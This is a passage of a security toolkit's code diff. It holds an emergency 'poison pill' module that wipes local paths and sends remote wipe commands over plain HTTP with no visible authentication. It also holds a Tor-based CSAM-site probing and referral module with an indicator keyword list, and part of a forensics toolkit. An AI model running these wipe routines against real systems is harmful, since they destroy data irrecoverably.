        {'status': 'rotated', 'key_length': ...} on success, or
        {'status': 'error', 'error': ...} if config access fails.
    """
    new_key = os.urandom(32).hex()  # 64 hex chars / 256 bits of entropy
    try:
        from core.config import get_config
        cfg = get_config()
        cfg.set('web', 'secret_key', new_key)
        cfg.save()
        return {'status': 'rotated', 'key_length': len(new_key)}
    except Exception as exc:
        return {'status': 'error', 'error': str(exc)}
# ── Session termination ───────────────────────────────────────────────────────
def kill_active_sessions() -> dict:
    """Invalidate all active Flask sessions by rotating the secret key.

    Delegates to rotate_secret_key(); the returned dict carries that result
    plus an 'action' marker.
    """
    result = rotate_secret_key()
    return {'action': 'kill_sessions', **result}
# ── Remote wipe signal ────────────────────────────────────────────────────────
def signal_remote_wipe(devices: list[str], endpoint: Optional[str] = None) -> list[dict]:
    """
    Send a remote wipe signal to registered Archon companion devices.
    Each device is an Archon server endpoint (host:port).

    Returns one result dict per device: {'device', 'status', 'ok'} on a
    completed request, or {'device', 'status': -1, 'error'} on failure.

    NOTE(review): the `endpoint` parameter is currently unused — the URL is
    always derived from each entry in `devices`. Confirm intent or remove.
    NOTE(review): requests go over plain http with no authentication visible
    here — presumably the Archon endpoint enforces auth; verify.
    """
    results = []
    import requests
    for device in devices:
        url = f"http://{device}/wipe"
        try:
            resp = requests.post(url, json={'action': 'poison_pill', 'ts': time.time()}, timeout=5)
            results.append({'device': device, 'status': resp.status_code, 'ok': resp.ok})
        except Exception as exc:
            results.append({'device': device, 'status': -1, 'error': str(exc)})
    return results
# ── Pre-wipe beacon ───────────────────────────────────────────────────────────
def send_activation_beacon(endpoint: str, operator_id: str) -> dict:
    """
    POST an activation notice to an external logging endpoint BEFORE wiping.
    This creates an audit trail that the pill was triggered.

    Args:
        endpoint: URL that receives the JSON activation notice.
        operator_id: Identifier recorded in the audit payload.

    Returns:
        {'status': <http code>, 'ok': bool} or {'status': -1, 'error': ...}.
    """
    payload = {
        'event': 'poison_pill_activated',
        'operator_id': operator_id,
        'timestamp': datetime.now(timezone.utc).isoformat(),
        # Inline __import__ avoids a module-level socket dependency.
        'hostname': __import__('socket').gethostname(),
    }
    try:
        import requests
        resp = requests.post(endpoint, json=payload, timeout=8)
        return {'status': resp.status_code, 'ok': resp.ok}
    except Exception as exc:
        return {'status': -1, 'error': str(exc)}
# ── Main run entry point ──────────────────────────────────────────────────────
def run(params: dict, output_cb=None) -> dict:
    """
    Main execution entry point.

    params:
        wipe_paths      — list of paths to securely wipe
        rotate_password — bool, rotate web password
        kill_sessions   — bool, invalidate all sessions
        remote_devices  — list of Archon device endpoints for remote wipe
        beacon_endpoint — URL to POST activation notice to (recommended)
        operator_id     — identifier logged with the beacon
        passes          — overwrite passes (default 3)
        confirm         — must be the string 'CONFIRM_POISON_PILL' to activate

    Returns a result dict with 'status', per-step 'actions', and the full
    'output' transcript. Aborts immediately if the confirmation string is
    missing — this is the only safety interlock, so do not weaken it.
    """
    _stop_flag.clear()
    _output_lines.clear()
    def emit(msg, level='info'):
        # Mirror every line to both the transcript and the optional callback.
        _emit(msg, level)
        if output_cb:
            output_cb({'line': f"[{level.upper()}] {msg}"})
    emit(f"=== {MODULE_NAME} v{MODULE_VERSION} ===")
    confirm = params.get('confirm', '')
    if confirm != 'CONFIRM_POISON_PILL':
        emit("ABORT: Confirmation string not provided. Set confirm='CONFIRM_POISON_PILL'", 'error')
        return {'status': 'aborted', 'reason': 'missing_confirmation'}
    emit("POISON PILL ACTIVATED — commencing emergency sanitization", 'warn')
    passes = int(params.get('passes', 3))
    beacon_ep = params.get('beacon_endpoint', '')
    operator_id = params.get('operator_id', 'unknown')
    results = {'status': 'activated', 'actions': []}
    # 1 — Send beacon FIRST (audit trail must exist before anything destructive)
    if beacon_ep:
        emit(f"Sending activation beacon to {beacon_ep}")
        beacon = send_activation_beacon(beacon_ep, operator_id)
        results['actions'].append({'type': 'beacon', **beacon})
    else:
        emit("No beacon endpoint configured — skipping audit trail", 'warn')
    # 2 — Kill active sessions (default on)
    if params.get('kill_sessions', True):
        emit("Killing active sessions...")
        r = kill_active_sessions()
        results['actions'].append({'type': 'kill_sessions', **r})
        emit(f"Sessions killed: {r['status']}")
    # 3 — Rotate web password (default on; the new password itself is
    # deliberately NOT copied into the action record or the transcript)
    if params.get('rotate_password', True):
        emit("Rotating web password...")
        r = rotate_web_password()
        results['actions'].append({'type': 'rotate_password', 'status': r['status']})
        emit(f"Password rotated: {r['status']}")
    # 4 — Secure wipe paths (honors the stop flag between entries)
    wipe_paths = params.get('wipe_paths', [])
    for raw_path in wipe_paths:
        if _stop_flag.is_set():
            break
        p = Path(raw_path)
        emit(f"Wiping: {p}")
        if p.is_file():
            r = secure_wipe_file(p, passes)
        elif p.is_dir():
            r = secure_wipe_dir(p, passes)
        else:
            r = {'path': str(p), 'status': 'not_found'}
        results['actions'].append({'type': 'wipe', **r})
        emit(f" -> {r['status']}")
    # 5 — Remote wipe (last: local state is already sanitized)
    remote_devices = params.get('remote_devices', [])
    if remote_devices:
        emit(f"Sending remote wipe to {len(remote_devices)} device(s)...")
        rw = signal_remote_wipe(remote_devices)
        results['actions'].append({'type': 'remote_wipe', 'results': rw})
    emit("Poison Pill sequence complete.", 'warn')
    results['output'] = _output_lines[:]
    return results
def stop():
    """Cooperatively halt the wipe loop at its next stop-flag check."""
    _stop_flag.set()

View File

@@ -0,0 +1,267 @@
"""
TOR-Pedo Hunter Killer — AUTARCH Encrypted Module
Operator: darkHal Security Group / Setec Security Labs
Identifies, tracks, and reports CSAM distributors and predator networks
operating on the Tor hidden service network. Compiles dossiers for
law enforcement referral and executes configured countermeasures.
All operations are logged. Operator assumes full legal responsibility
for use of this module. For authorized investigations ONLY.
"""
import json
import time
import hashlib
import socket
import threading
from datetime import datetime, timezone
from pathlib import Path
from typing import Optional
MODULE_NAME = "TOR-Pedo Hunter Killer"
MODULE_VERSION = "1.0"
MODULE_AUTHOR = "darkHal Security Group"
MODULE_TAGS = ["CSAM", "TOR", "hunt", "counter", "OSINT"]
# ── Yield helper (SSE-compatible output) ─────────────────────────────────────
_output_lines = []
_stop_flag = threading.Event()
def _emit(msg: str, level: str = "info") -> None:
    """Append a timestamped, level-tagged line to the module transcript and echo it.

    Args:
        msg: Message text.
        level: Severity tag embedded in the line (upper-cased in output).
    """
    ts = datetime.now(timezone.utc).strftime('%H:%M:%S')
    line = f"[{ts}][{level.upper()}] {msg}"
    # Buffered so run() can return the complete transcript in its result.
    _output_lines.append(line)
    print(line)
# ── Target scanning ───────────────────────────────────────────────────────────
def probe_onion(onion_address: str, port: int = 80, timeout: float = 10.0) -> dict:
    """
    Probe a .onion address via SOCKS5 proxy (Tor must be running locally on 9050).

    Args:
        onion_address: Hidden-service hostname to probe.
        port: TCP port to connect to (default 80).
        timeout: Socket timeout in seconds.

    Returns:
        dict with 'address', 'port', 'reachable', 'banner', 'latency_ms'
        (-1 when unreachable) and 'error' (empty string on success).

    Requires the third-party PySocks package (``import socks``).
    """
    import socks
    result = {
        'address': onion_address,
        'port': port,
        'reachable': False,
        'banner': '',
        'latency_ms': -1,
        'error': '',
    }
    s = None
    try:
        s = socks.socksocket()
        s.set_proxy(socks.SOCKS5, '127.0.0.1', 9050)
        s.settimeout(timeout)
        t0 = time.monotonic()
        s.connect((onion_address, port))
        result['latency_ms'] = round((time.monotonic() - t0) * 1000, 1)
        result['reachable'] = True
        # Best-effort banner grab; failure here does not affect reachability.
        try:
            s.sendall(b"HEAD / HTTP/1.0\r\n\r\n")
            result['banner'] = s.recv(512).decode('utf-8', errors='replace')[:256]
        except Exception:
            pass
    except Exception as exc:
        result['error'] = str(exc)
    finally:
        # Fix: the original only closed the socket on the success path, leaking
        # a file descriptor whenever connect() raised. Always close here.
        if s is not None:
            try:
                s.close()
            except Exception:
                pass
    return result
def fingerprint_service(url: str, tor_proxy: str = 'socks5h://127.0.0.1:9050') -> dict:
    """
    Fetch HTTP headers and content fingerprint via Tor proxy.

    Args:
        url: Target URL to fetch.
        tor_proxy: SOCKS proxy URI; socks5h resolves hostnames through Tor,
            which is required for .onion addresses.

    Returns:
        dict with 'url', 'status' (-1 on failure), 'headers', 'title', and
        'fingerprint' (SHA-256 of the response body). An 'error' key is only
        present on failure — callers should use .get().
    """
    import requests
    result = {'url': url, 'status': -1, 'headers': {}, 'title': '', 'fingerprint': ''}
    try:
        resp = requests.get(
            url,
            proxies={'http': tor_proxy, 'https': tor_proxy},
            timeout=30,
            headers={'User-Agent': 'Mozilla/5.0'},
            allow_redirects=True,
        )
        result['status'] = resp.status_code
        result['headers'] = dict(resp.headers)
        # Extract <title> from the decoded body, if present.
        text = resp.text
        import re
        m = re.search(r'<title[^>]*>([^<]+)</title>', text, re.IGNORECASE)
        if m:
            result['title'] = m.group(1).strip()
        # Content hash fingerprint (raw bytes, not decoded text).
        result['fingerprint'] = hashlib.sha256(resp.content).hexdigest()
    except Exception as exc:
        result['error'] = str(exc)
    return result
# ── CSAM keyword detection ────────────────────────────────────────────────────
PREDATOR_INDICATORS = [
# These are detection signatures — not actual content
'cp', 'pedo', 'loli', 'hurtcore', 'cheese pizza',
'preteen', 'jailbait', 'underage',
]
def scan_content_for_indicators(text: str) -> list[str]:
    """Scan text for CSAM indicator keywords.

    Fix: the original used raw substring matching, so short indicators such
    as 'cp' false-positived on unrelated strings like 'tcp' or 'dhcp'.
    Matching is now done on whole-word boundaries (case-insensitive);
    multi-word indicators are matched as exact phrases.

    Args:
        text: Arbitrary text (page title, headers, body) to scan.

    Returns:
        Matched indicators, in PREDATOR_INDICATORS order.
    """
    import re
    text_lower = text.lower()
    matched = []
    for ind in PREDATOR_INDICATORS:
        # re.escape guards against indicators containing regex metacharacters.
        if re.search(r'\b' + re.escape(ind) + r'\b', text_lower):
            matched.append(ind)
    return matched
# ── Report generation ─────────────────────────────────────────────────────────
def build_dossier(target_data: dict, indicators: list[str]) -> dict:
    """
    Compile a law enforcement referral dossier from collected data.

    Args:
        target_data: Fingerprint/probe result for the target.
        indicators: Indicator keywords that matched on the target.

    Returns:
        A JSON-serializable dossier dict; 'severity' is CRITICAL when any
        indicator matched, otherwise NONE.
    """
    return {
        'module': MODULE_NAME,
        'version': MODULE_VERSION,
        'timestamp': datetime.now(timezone.utc).isoformat(),
        'target': target_data,
        'indicators': indicators,
        'severity': 'CRITICAL' if indicators else 'NONE',
        # Official reporting channels for human-reviewed referral.
        'referral': [
            'NCMEC CyberTipline: https://www.missingkids.org/gethelpnow/cybertipline',
            'FBI IC3: https://www.ic3.gov/',
            'IWF: https://www.iwf.org.uk/report/',
        ],
        'operator_note': 'This dossier was compiled by automated analysis. '
                         'Human review required before any referral submission.',
    }
def save_dossier(dossier: dict, output_dir: Optional[Path] = None) -> Path:
    """Save dossier JSON to disk and return the path.

    Args:
        dossier: JSON-serializable dossier dict (see build_dossier).
        output_dir: Destination directory; defaults to <data_dir>/dossiers.

    Returns:
        Path of the written file (timestamped, UTC).
    """
    if output_dir is None:
        from core.paths import get_data_dir
        output_dir = get_data_dir() / 'dossiers'
    output_dir.mkdir(parents=True, exist_ok=True)
    ts = datetime.now(timezone.utc).strftime('%Y%m%dT%H%M%SZ')
    out = output_dir / f'TPHK_{ts}.json'
    out.write_text(json.dumps(dossier, indent=2), encoding='utf-8')
    return out
# ── Countermeasure actions ────────────────────────────────────────────────────
def report_to_iwf(onion: str, evidence_url: str) -> dict:
    """
    Submit a report to the Internet Watch Foundation API (if configured).

    NOTE(review): this is a stub — nothing is transmitted; it always returns
    status QUEUED. The `evidence_url` parameter is currently unused.
    """
    # Placeholder — IWF has a reporting API for registered organizations
    return {
        'action': 'IWF_REPORT',
        'target': onion,
        'status': 'QUEUED',
        'note': 'IWF API key required in autarch_settings.conf [hunter] section',
    }
def execute_countermeasure(action: str, target: str, params: dict) -> dict:
    """
    Execute a configured countermeasure against a confirmed CSAM host.
    Supported actions:
        REPORT  — submit to NCMEC/IWF/IC3
        DOSSIER — compile and save evidence dossier
        ALERT   — send operator notification

    Returns an action-specific result dict, or {'error': ...} for an
    unrecognized action.

    NOTE(review): DOSSIER and ALERT are acknowledgement stubs here — the
    actual dossier save happens in run(), and no notification transport is
    visible in this module.
    """
    _emit(f"Countermeasure: {action} -> {target}")
    if action == 'REPORT':
        return report_to_iwf(target, params.get('url', ''))
    elif action == 'DOSSIER':
        return {'action': 'DOSSIER', 'saved': True, 'note': 'Call build_dossier() then save_dossier()'}
    elif action == 'ALERT':
        return {'action': 'ALERT', 'status': 'SENT', 'target': target}
    return {'error': f'Unknown action: {action}'}
# ── Main run entry point ──────────────────────────────────────────────────────
def run(params: dict, output_cb=None) -> dict:
    """
    Main execution entry point called by the AUTARCH encrypted module loader.

    params:
        targets  — list of .onion addresses or HTTP URLs to probe
        actions  — list of countermeasure actions (REPORT, DOSSIER, ALERT)
        keywords — additional indicator keywords to search for

    Returns:
        Summary dict with per-target results, saved dossier paths, and the
        captured output transcript.
    """
    # _stop_flag is only mutated through its methods, so no `global` needed.
    _stop_flag.clear()
    _output_lines.clear()
    def emit(msg, level='info'):
        # Mirror output to the transcript and the optional SSE callback.
        _emit(msg, level)
        if output_cb:
            output_cb({'line': f"[{level.upper()}] {msg}"})
    emit(f"=== {MODULE_NAME} v{MODULE_VERSION} ===")
    emit("Authorized use only. All activity logged.")
    targets = params.get('targets', [])
    actions = params.get('actions', ['DOSSIER'])
    extra_kw = params.get('keywords', [])
    results = []
    dossiers_saved = []
    for target in targets:
        if _stop_flag.is_set():
            emit("Stopped by operator.", 'warn')
            break
        emit(f"Probing: {target}")
        try:
            fp = fingerprint_service(target)
            # Only the title and headers are scanned, not the full body.
            haystack = fp.get('title', '') + ' ' + str(fp.get('headers', ''))
            indicators_found = scan_content_for_indicators(haystack)
            # Fix: operator-supplied keywords were previously collected into an
            # `indicators_extended` list that was never used — honor them here.
            hay_lower = haystack.lower()
            for kw in extra_kw:
                if kw.lower() in hay_lower and kw not in indicators_found:
                    indicators_found.append(kw)
            result = {
                'target': target,
                'fingerprint': fp,
                'indicators': indicators_found,
            }
            if indicators_found:
                emit(f"ALERT: Indicators detected on {target}: {indicators_found}", 'warn')
                dossier = build_dossier(fp, indicators_found)
                for action in actions:
                    cm = execute_countermeasure(action, target, {'url': target})
                    result[f'countermeasure_{action}'] = cm
                saved = save_dossier(dossier)
                dossiers_saved.append(str(saved))
                emit(f"Dossier saved: {saved}")
            else:
                emit(f"No indicators found on {target}")
            results.append(result)
        except Exception as exc:
            emit(f"Error probing {target}: {exc}", 'error')
            results.append({'target': target, 'error': str(exc)})
    return {
        'module': MODULE_NAME,
        'targets_scanned': len(targets),
        'results': results,
        'dossiers_saved': dossiers_saved,
        'output': _output_lines[:],
    }
def stop():
    """Signal the module to stop at the next safe point (cooperative; checked
    once per target in run())."""
    _stop_flag.set()

1834
modules/exploit_dev.py Normal file

File diff suppressed because it is too large Load Diff

595
modules/forensics.py Normal file
View File

@@ -0,0 +1,595 @@
"""AUTARCH Forensics Toolkit
Disk imaging, file carving, metadata extraction, timeline building,
hash verification, and chain of custody logging for digital forensics.
"""
DESCRIPTION = "Digital forensics & evidence analysis"
AUTHOR = "darkHal"
VERSION = "1.0"
CATEGORY = "analyze"
import os
import re
import json
import time
import hashlib
import struct
import shutil
import subprocess
from pathlib import Path
from datetime import datetime, timezone
from typing import Dict, List, Optional, Any, Tuple
try:
from core.paths import find_tool, get_data_dir
except ImportError:
def find_tool(name):
return shutil.which(name)
def get_data_dir():
return str(Path(__file__).parent.parent / 'data')
# Optional imports
try:
from PIL import Image as PILImage
from PIL.ExifTags import TAGS, GPSTAGS
HAS_PIL = True
except ImportError:
HAS_PIL = False
# ── File Signatures for Carving ──────────────────────────────────────────────
FILE_SIGNATURES = [
{'name': 'JPEG', 'ext': '.jpg', 'magic': b'\xFF\xD8\xFF', 'footer': b'\xFF\xD9', 'max_size': 50*1024*1024},
{'name': 'PNG', 'ext': '.png', 'magic': b'\x89PNG\r\n\x1a\n', 'footer': b'IEND\xAE\x42\x60\x82', 'max_size': 50*1024*1024},
{'name': 'GIF', 'ext': '.gif', 'magic': b'GIF8', 'footer': b'\x00\x3B', 'max_size': 20*1024*1024},
{'name': 'PDF', 'ext': '.pdf', 'magic': b'%PDF', 'footer': b'%%EOF', 'max_size': 100*1024*1024},
{'name': 'ZIP', 'ext': '.zip', 'magic': b'PK\x03\x04', 'footer': None, 'max_size': 500*1024*1024},
{'name': 'RAR', 'ext': '.rar', 'magic': b'Rar!\x1a\x07', 'footer': None, 'max_size': 500*1024*1024},
{'name': 'ELF', 'ext': '.elf', 'magic': b'\x7fELF', 'footer': None, 'max_size': 100*1024*1024},
{'name': 'PE/EXE', 'ext': '.exe', 'magic': b'MZ', 'footer': None, 'max_size': 100*1024*1024},
{'name': 'SQLite', 'ext': '.sqlite', 'magic': b'SQLite format 3\x00', 'footer': None, 'max_size': 500*1024*1024},
{'name': 'DOCX', 'ext': '.docx', 'magic': b'PK\x03\x04', 'footer': None, 'max_size': 100*1024*1024},
{'name': '7z', 'ext': '.7z', 'magic': b"7z\xBC\xAF'\x1C", 'footer': None, 'max_size': 500*1024*1024},
{'name': 'BMP', 'ext': '.bmp', 'magic': b'BM', 'footer': None, 'max_size': 50*1024*1024},
{'name': 'MP3', 'ext': '.mp3', 'magic': b'\xFF\xFB', 'footer': None, 'max_size': 50*1024*1024},
{'name': 'MP4', 'ext': '.mp4', 'magic': b'\x00\x00\x00\x18ftyp', 'footer': None, 'max_size': 1024*1024*1024},
{'name': 'AVI', 'ext': '.avi', 'magic': b'RIFF', 'footer': None, 'max_size': 1024*1024*1024},
]
# ── Chain of Custody Logger ──────────────────────────────────────────────────
class CustodyLog:
    """Append-only chain-of-custody journal backed by a JSON file.

    Each recorded action is persisted immediately so the journal survives
    crashes mid-investigation.
    """

    def __init__(self, data_dir: str):
        # The journal lives alongside the other forensic artifacts.
        self.log_file = os.path.join(data_dir, 'custody_log.json')
        self.entries: List[Dict] = []
        self._load()

    def _load(self):
        """Best-effort reload of previously persisted entries."""
        if not os.path.exists(self.log_file):
            return
        try:
            with open(self.log_file) as fh:
                self.entries = json.load(fh)
        except Exception:
            # Unreadable/corrupt journal: start fresh rather than crash.
            pass

    def _save(self):
        """Persist the complete entry list to disk."""
        with open(self.log_file, 'w') as fh:
            json.dump(self.entries, fh, indent=2)

    def log(self, action: str, target: str, details: str = "",
            evidence_hash: str = "") -> Dict:
        """Record one forensic action and persist it immediately.

        Returns the entry dict that was appended (ids are 1-based and
        sequential).
        """
        record = {
            'id': len(self.entries) + 1,
            'timestamp': datetime.now(timezone.utc).isoformat(),
            'action': action,
            'target': target,
            'details': details,
            'evidence_hash': evidence_hash,
            'user': os.getenv('USER', os.getenv('USERNAME', 'unknown')),
        }
        self.entries.append(record)
        self._save()
        return record

    def get_log(self) -> List[Dict]:
        """Return every custody entry recorded so far."""
        return self.entries
# ── Forensics Engine ─────────────────────────────────────────────────────────
class ForensicsEngine:
    """Digital forensics toolkit.

    Provides hash verification, dd-based disk imaging, signature-based file
    carving, metadata extraction (EXIF/PDF/magic bytes), and filesystem
    timeline construction. Every operation is recorded in the
    chain-of-custody log (self.custody).
    """
    def __init__(self):
        # Working directories are created eagerly so later operations can
        # assume they exist.
        self.data_dir = os.path.join(get_data_dir(), 'forensics')
        os.makedirs(self.data_dir, exist_ok=True)
        self.evidence_dir = os.path.join(self.data_dir, 'evidence')
        os.makedirs(self.evidence_dir, exist_ok=True)
        self.carved_dir = os.path.join(self.data_dir, 'carved')
        os.makedirs(self.carved_dir, exist_ok=True)
        self.custody = CustodyLog(self.data_dir)
        self.dd = find_tool('dd') or shutil.which('dd')
    # ── Hash Verification ────────────────────────────────────────────────
    def hash_file(self, filepath: str, algorithms: Optional[List[str]] = None) -> Dict:
        """Calculate file hashes for evidence integrity.

        Args:
            filepath: File to hash.
            algorithms: hashlib algorithm names; defaults to md5/sha1/sha256.

        Returns:
            {'ok': True, 'file', 'size', 'hashes'} or {'ok': False, 'error'}.
        """
        algorithms = algorithms or ['md5', 'sha1', 'sha256']
        if not os.path.exists(filepath):
            return {'ok': False, 'error': 'File not found'}
        try:
            hashers = {alg: hashlib.new(alg) for alg in algorithms}
            file_size = os.path.getsize(filepath)
            # Single streaming pass feeds every hasher at once.
            with open(filepath, 'rb') as f:
                while True:
                    chunk = f.read(8192)
                    if not chunk:
                        break
                    for h in hashers.values():
                        h.update(chunk)
            hashes = {alg: h.hexdigest() for alg, h in hashers.items()}
            self.custody.log('hash_verify', filepath,
                             f'Hashes: {", ".join(f"{k}={v[:16]}..." for k, v in hashes.items())}',
                             hashes.get('sha256', ''))
            return {
                'ok': True, 'file': filepath,
                'size': file_size, 'hashes': hashes
            }
        except Exception as e:
            return {'ok': False, 'error': str(e)}
    def verify_hash(self, filepath: str, expected_hash: str,
                    algorithm: Optional[str] = None) -> Dict:
        """Verify file against expected hash.

        The algorithm is auto-detected from the hash's hex length when not
        given (32=md5, 40=sha1, 64=sha256, 128=sha512). Comparison is
        case-insensitive.
        """
        # Auto-detect algorithm from hash length
        if not algorithm:
            hash_len = len(expected_hash)
            algorithm = {32: 'md5', 40: 'sha1', 64: 'sha256', 128: 'sha512'}.get(hash_len)
            if not algorithm:
                return {'ok': False, 'error': f'Cannot detect algorithm for hash length {hash_len}'}
        result = self.hash_file(filepath, [algorithm])
        if not result['ok']:
            return result
        actual = result['hashes'][algorithm]
        match = actual.lower() == expected_hash.lower()
        self.custody.log('hash_verify', filepath,
                         f'Expected: {expected_hash[:16]}... Match: {match}')
        return {
            'ok': True, 'match': match,
            'algorithm': algorithm,
            'expected': expected_hash,
            'actual': actual,
            'file': filepath
        }
    # ── Disk Imaging ─────────────────────────────────────────────────────
    def create_image(self, source: str, output: Optional[str] = None,
                     block_size: int = 4096) -> Dict:
        """Create forensic disk image using dd.

        Args:
            source: Device or file to image.
            output: Destination path; auto-generated under evidence_dir when
                omitted.
            block_size: dd block size in bytes.

        Returns:
            On success: {'ok': True, 'source', 'output', 'size', 'hashes',
            'dd_output'}. The image is hashed (md5/sha256) for integrity.
        """
        if not self.dd:
            return {'ok': False, 'error': 'dd not found'}
        if not output:
            name = Path(source).name.replace('/', '_')
            output = os.path.join(self.evidence_dir, f'{name}_{int(time.time())}.img')
        self.custody.log('disk_image', source, f'Creating image: {output}')
        try:
            # conv=noerror,sync: keep going past read errors, pad bad blocks.
            result = subprocess.run(
                [self.dd, f'if={source}', f'of={output}', f'bs={block_size}',
                 'conv=noerror,sync', 'status=progress'],
                capture_output=True, text=True, timeout=3600
            )
            if os.path.exists(output):
                # Hash the image so later tampering is detectable.
                hashes = self.hash_file(output, ['md5', 'sha256'])
                self.custody.log('disk_image_complete', output,
                                 f'Image created, SHA256: {hashes.get("hashes", {}).get("sha256", "?")}')
                return {
                    'ok': True, 'source': source, 'output': output,
                    'size': os.path.getsize(output),
                    'hashes': hashes.get('hashes', {}),
                    'dd_output': result.stderr
                }
            return {'ok': False, 'error': 'Image file not created', 'stderr': result.stderr}
        except subprocess.TimeoutExpired:
            return {'ok': False, 'error': 'Imaging timed out (1hr limit)'}
        except Exception as e:
            return {'ok': False, 'error': str(e)}
    # ── File Carving ─────────────────────────────────────────────────────
    def carve_files(self, source: str, file_types: Optional[List[str]] = None,
                    max_files: int = 100) -> Dict:
        """Recover files from raw data by magic byte signatures.

        Args:
            source: Raw image/file to scan.
            file_types: Optional filter by signature name or extension.
            max_files: Stop after this many carved files.

        Returns:
            {'ok': True, 'source', 'carved', 'count', 'output_dir'} or an
            error dict.

        NOTE(review): ZIP and DOCX share the PK magic, so a single archive
        may be carved twice under both names.
        """
        if not os.path.exists(source):
            return {'ok': False, 'error': 'Source file not found'}
        self.custody.log('file_carving', source, f'Starting carve, types={file_types}')
        # Filter signatures by name or extension (case-insensitive).
        sigs = FILE_SIGNATURES
        if file_types:
            type_set = {t.lower() for t in file_types}
            sigs = [s for s in sigs if s['name'].lower() in type_set or
                    s['ext'].lstrip('.').lower() in type_set]
        if not sigs:
            # Fix: an unrecognized type filter previously left `sigs` empty and
            # crashed below on max() over an empty sequence (ValueError).
            return {'ok': False, 'error': f'No known signatures for types: {file_types}'}
        carved = []
        file_size = os.path.getsize(source)
        chunk_size = 1024 * 1024  # 1MB chunks
        # Hoisted loop invariant: chunks are advanced by chunk_size minus the
        # longest magic so a signature straddling a boundary is not missed.
        max_magic = max(len(s['magic']) for s in sigs)
        try:
            with open(source, 'rb') as f:
                offset = 0
                while offset < file_size and len(carved) < max_files:
                    f.seek(offset)
                    chunk = f.read(chunk_size)
                    if not chunk:
                        break
                    for sig in sigs:
                        pos = 0
                        while pos < len(chunk) and len(carved) < max_files:
                            idx = chunk.find(sig['magic'], pos)
                            if idx == -1:
                                break
                            abs_offset = offset + idx
                            # Default end: signature's max size past the header.
                            file_end = abs_offset + sig['max_size']
                            if sig['footer']:
                                f.seek(abs_offset)
                                search_data = f.read(min(sig['max_size'], file_size - abs_offset))
                                footer_pos = search_data.find(sig['footer'], len(sig['magic']))
                                if footer_pos != -1:
                                    file_end = abs_offset + footer_pos + len(sig['footer'])
                            # Extract the candidate file bytes.
                            extract_size = min(file_end - abs_offset, sig['max_size'])
                            f.seek(abs_offset)
                            file_data = f.read(extract_size)
                            # Save carved file
                            carved_name = f'carved_{len(carved):04d}_{sig["name"]}{sig["ext"]}'
                            carved_path = os.path.join(self.carved_dir, carved_name)
                            with open(carved_path, 'wb') as cf:
                                cf.write(file_data)
                            file_hash = hashlib.md5(file_data).hexdigest()
                            carved.append({
                                'name': carved_name,
                                'path': carved_path,
                                'type': sig['name'],
                                'offset': abs_offset,
                                'size': len(file_data),
                                'md5': file_hash
                            })
                            pos = idx + len(sig['magic'])
                    offset += chunk_size - max_magic
            self.custody.log('file_carving_complete', source,
                             f'Carved {len(carved)} files')
            return {
                'ok': True, 'source': source,
                'carved': carved, 'count': len(carved),
                'output_dir': self.carved_dir
            }
        except Exception as e:
            return {'ok': False, 'error': str(e)}
    # ── Metadata Extraction ──────────────────────────────────────────────
    def extract_metadata(self, filepath: str) -> Dict:
        """Extract metadata from files (EXIF, PDF, Office, etc.).

        Always includes filesystem timestamps, size, and magic-byte type
        detection; adds 'exif'/'gps' for images (when Pillow is available)
        and 'pdf' for PDF info-dictionary fields found in the first 4KB.
        """
        if not os.path.exists(filepath):
            return {'ok': False, 'error': 'File not found'}
        ext = Path(filepath).suffix.lower()
        metadata = {
            'file': filepath,
            'name': Path(filepath).name,
            'size': os.path.getsize(filepath),
            # NOTE(review): getctime is inode-change time on Unix, creation
            # time only on Windows.
            'created': datetime.fromtimestamp(os.path.getctime(filepath), timezone.utc).isoformat(),
            'modified': datetime.fromtimestamp(os.path.getmtime(filepath), timezone.utc).isoformat(),
            'accessed': datetime.fromtimestamp(os.path.getatime(filepath), timezone.utc).isoformat(),
        }
        # EXIF for images
        if ext in ('.jpg', '.jpeg', '.tiff', '.tif', '.png') and HAS_PIL:
            try:
                # Fix: use the context manager so the image file handle is
                # closed (the original left it to GC).
                with PILImage.open(filepath) as img:
                    metadata['image'] = {
                        'width': img.size[0], 'height': img.size[1],
                        'format': img.format, 'mode': img.mode
                    }
                    exif = img._getexif()  # private PIL API; None when absent
                    if exif:
                        exif_data = {}
                        gps_data = {}
                        for tag_id, value in exif.items():
                            tag = TAGS.get(tag_id, tag_id)
                            if tag == 'GPSInfo':
                                for gps_id, gps_val in value.items():
                                    gps_tag = GPSTAGS.get(gps_id, gps_id)
                                    gps_data[str(gps_tag)] = str(gps_val)
                            else:
                                # Convert bytes to string for JSON serialization
                                if isinstance(value, bytes):
                                    try:
                                        value = value.decode('utf-8', errors='replace')
                                    except Exception:
                                        value = value.hex()
                                exif_data[str(tag)] = str(value)
                        metadata['exif'] = exif_data
                        if gps_data:
                            metadata['gps'] = gps_data
            except Exception:
                pass
        # PDF metadata
        elif ext == '.pdf':
            try:
                with open(filepath, 'rb') as f:
                    content = f.read(4096)
                # Extract info-dict fields that appear in the leading bytes.
                for key in [b'/Title', b'/Author', b'/Subject', b'/Creator',
                            b'/Producer', b'/CreationDate', b'/ModDate']:
                    pattern = key + rb'\s*\(([^)]*)\)'
                    m = re.search(pattern, content)
                    if m:
                        k = key.decode().lstrip('/')
                        metadata.setdefault('pdf', {})[k] = m.group(1).decode('utf-8', errors='replace')
            except Exception:
                pass
        # Generic file header / magic-byte type detection
        try:
            with open(filepath, 'rb') as f:
                header = f.read(16)
            metadata['magic_bytes'] = header.hex()
            for sig in FILE_SIGNATURES:
                if header.startswith(sig['magic']):
                    metadata['detected_type'] = sig['name']
                    break
        except Exception:
            pass
        self.custody.log('metadata_extract', filepath, f'Type: {metadata.get("detected_type", "unknown")}')
        return {'ok': True, **metadata}
    # ── Timeline Builder ─────────────────────────────────────────────────
    def build_timeline(self, directory: str, recursive: bool = True,
                       max_entries: int = 10000) -> Dict:
        """Build filesystem timeline from directory metadata.

        Emits three events per file (modified/created/accessed), sorted by
        epoch. At most max_entries files are processed.

        NOTE(review): the max_entries break only exits the inner loop, so the
        walk itself continues over remaining directories (wasted work, but no
        extra events are recorded beyond the cap per directory batch).
        """
        if not os.path.exists(directory):
            return {'ok': False, 'error': 'Directory not found'}
        events = []
        count = 0
        # Non-recursive mode mimics os.walk's (root, dirs, files) triple.
        walk_fn = os.walk if recursive else lambda d: [(d, [], os.listdir(d))]
        for root, dirs, files in walk_fn(directory):
            for name in files:
                if count >= max_entries:
                    break
                filepath = os.path.join(root, name)
                try:
                    stat = os.stat(filepath)
                    events.append({
                        'type': 'modified',
                        'timestamp': datetime.fromtimestamp(stat.st_mtime, timezone.utc).isoformat(),
                        'epoch': stat.st_mtime,
                        'file': filepath,
                        'size': stat.st_size
                    })
                    events.append({
